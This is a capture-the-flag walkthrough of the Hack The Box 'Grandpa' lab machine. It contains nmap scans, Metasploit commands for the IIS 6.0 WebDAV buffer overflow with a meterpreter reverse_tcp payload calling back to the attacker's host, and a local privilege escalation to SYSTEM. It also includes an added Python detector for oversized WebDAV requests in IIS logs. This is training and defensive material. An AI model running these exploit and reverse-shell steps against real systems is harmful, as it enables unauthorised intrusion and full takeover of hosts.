Let’s get started!
This is the initial step: scan the machine for open services.
COMMAND: nmap -sC -sV -O -oA grandpa 10.10.10.14
Enumerating Port 80
1. Browse to http://10.10.10.14
As we can see, port 80 is open with IIS 6.0 running on it.
Let's look for exploits against IIS; there are a number of them. The one we will use is this.
Here is a sample exploit for the above-mentioned vulnerability.
Let's use Nmap to check whether this machine is vulnerable to the exploit.
We need to create the script file inside the nmap scripts directory:
COMMAND: nano iis-buffer-overflow.nse
Run the iis-buffer-overflow NSE script
Now that the script has been created, let's see if the machine is vulnerable to this exploit:
nmap --script iis-buffer-overflow 10.10.10.14
Now that we know the machine is vulnerable, let's find a working exploit!
Initial Foothold and Priv Esc – Root
ExplodingCan IIS 6.0 WebDAV BoF Exploit
ExplodingCan is an NSA-made exploit that targets WebDAV on IIS 6.0. I found this GitHub page that details how the exploit works, along with a Python script.
I also found out that there is a Metasploit exploit for this, which I had to use because my shells from the Python script always failed with both netcat and multi/handler.
So, to exploit the vulnerability, I'm going to use the Metasploit method:
Find the exploit
Let's use the Metasploit search function to find the correct exploit:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set rhosts 10.10.10.14
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.14.2
set SESSION 1
set lport 9002
run
We got a shell, but access is denied when we try to read the user flag.
Let's background the current session and run another exploit to get around the permission problem!
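From the defender's side, the WebDAV traffic this exploit generates stands out in IIS W3C logs: an IIS 6.0 box that is not meant to serve WebDAV should see no PROPFIND at all, and the overflow request is far larger than a normal one. The following detector is an added example, not part of the original writeup; the log lines, field layout and the 2048-byte threshold are constructed assumptions.

```python
"""Flag oversized WebDAV requests in IIS W3C-format logs.
Added example with constructed sample data; not from the original writeup."""

# WebDAV methods a server that does not intentionally expose WebDAV should never see.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK"}
# Assumed request-size threshold (cs-bytes, headers included): normal PROPFIND
# requests are a few hundred bytes, overflow traffic is far larger.
LARGE_REQUEST_BYTES = 2048


def parse_w3c(lines):
    """Yield one dict per log record, mapping columns via the #Fields directive."""
    fields = None
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line: skip rather than mis-map the columns
        yield dict(zip(fields, parts))


def suspicious_webdav(lines):
    """Return (client_ip, method, uri, request_bytes) for oversized WebDAV requests."""
    hits = []
    for rec in parse_w3c(lines):
        method = rec.get("cs-method", "")
        try:
            size = int(rec.get("cs-bytes", "0"))
        except ValueError:
            continue
        if method in WEBDAV_METHODS and size >= LARGE_REQUEST_BYTES:
            hits.append((rec.get("c-ip"), method, rec.get("cs-uri-stem"), size))
    return hits


# Constructed sample log: a benign GET, a small PROPFIND, and one oversized PROPFIND.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status cs-bytes
2017-04-10 12:00:01 10.10.14.2 GET /index.htm 200 310
2017-04-10 12:00:05 10.10.14.2 PROPFIND / 207 420
2017-04-10 12:00:09 10.10.14.2 PROPFIND / 500 145000
""".splitlines()

if __name__ == "__main__":
    for hit in suspicious_webdav(SAMPLE_LOG):
        print("suspicious WebDAV request:", hit)
```

Point it at the real W3C log directory of an IIS 6.0 host; the #Fields line in each file decides the column mapping, so the logged field set only needs to include cs-method and cs-bytes.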
Local Exploit Suggester
I'm going to use the built-in Metasploit post-exploitation module, Local Exploit Suggester, to find a route to either Harry or Administrator.
So the machine looks to be vulnerable to a few exploits, but we will concentrate on the bottom one: ppr_flatten_rec
set session 1
set lhost 10.10.14.2
set lport 9003
After I ran the exploit, I got some errors and the exploit failed to run!
Let's get back into the previous session and migrate to another process so we can run the exploit!
So, I'm going to migrate into the davdata.exe process.
COMMAND: migrate 2244
Running the exploit again
Now that we have migrated to a new process, let's run the exploit again:
And the exploit works, we get a new meterpreter session as SYSTEM!
If you like my writeup, give me Respect on my HTB profile: Exp1o1t9r